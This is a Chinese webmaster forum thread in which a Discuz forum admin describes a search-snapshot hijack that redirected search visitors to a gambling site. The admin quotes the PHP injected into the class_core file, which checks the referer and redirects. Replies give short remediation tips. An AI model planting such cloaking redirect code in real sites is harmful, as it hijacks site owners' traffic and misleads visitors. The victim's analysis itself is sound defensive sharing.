社区首页 › 站长杂谈 › 最新快照劫持及网页篡改网站入侵挂马问题

七彩的风车 发表于 2017-2-5 10:47:37

最新快照劫持及网页篡改网站入侵挂马问题

本帖最后由 张老师101 于 2016-12-25 22:29 编辑

dz3.2论坛发现网站快照搜索引擎收录，同本网站内容不一致,百度和360以及搜狗都收录了大量本站不存在的帖子，论坛所有帖子和回复都是人工审核的，不可能出现收录的这种博彩类信息。百度收录的快照都点进去不存在，360收录的快照点进去有的是真是的帖子，但和快照内容不一样（帖子内容被替换），有的从搜索引擎点击跳转到一个博彩网站，后检查代码删除一段代码后，不跳转了。
如site:www.op5u.com,出现一堆博彩网站

后来又发现，用百度和360站在工具模拟抓取依然所有文件头部都被插入了链接
http://att.discuz.net/data/attachment/forum/201612/14/122750kaculootoml3mflp.jpg

技术小白，第一次碰到这种问题，然后在官网上各种查以前朋友遇到是怎么处理的。后台检验文件什么的，经过检查对比文件发现以下几处异常
一、class_core文件头部插入跳转代码
error_reporting(E_ALL);
@error_reporting(1);
@$ref = strtolower($_SERVER['HTTP_REFERER']);
@$jump_ref= explode("|","haoso.|so.|haosou.|google.|soso.");
foreach($jump_ref as $r){
      $r = trim($r);
      if(stristr($ref,$r)){
                if($_GET['tid']>50000){
                        header('Location: http://www.yzx002.com/?op5u');
                        die();
                }
      }
}复制代码
追加，经过不断排查代码 基本上找到清除完了恶意代码，目前收录逐步恢复中。。。

桃之夭夭妞妞 发表于 2017-2-5 10:47:37

不会是哪里设置的问题吧。

紫微真人001 发表于 2017-2-5 10:47:37

补丁打到最新

8尘缘非8 发表于 2017-2-5 10:47:37

如何可以重来 发表于 2017-2-5 10:47:37

设置文件权限即可。

aslongxing 发表于 2017-2-5 10:47:37

跟你一样，到现在还不知道原因。。修改了，没几个小时又恢复。。现在是更新缓存，就正常，几个小时后又被劫持。。

小晓的我崭 发表于 2017-2-5 10:47:37

chbigeye 发表于 2016-12-16 15:07
跟你一样，到现在还不知道原因。。修改了，没几个小时又恢复。。现在是更新缓存，就正常，几个小时后又被劫 ...
服务器中毒了 尽快清理哦

自信的文盲 发表于 2017-2-5 10:47:37

chbigeye 发表于 2016-12-16 15:07
跟你一样，到现在还不知道原因。。修改了，没几个小时又恢复。。现在是更新缓存，就正常，几个小时后又被劫 ...
我的基本上解决了，收录恢复更新中

原来我也可以20 发表于 2017-2-5 10:47:37

张老师101 发表于 2016-12-17 09:51
我的基本上解决了，收录恢复更新中
我的QQ：198587 ，麻烦你加下，有问题想请教！

查看完整版本: 最新快照劫持及网页篡改网站入侵挂马问题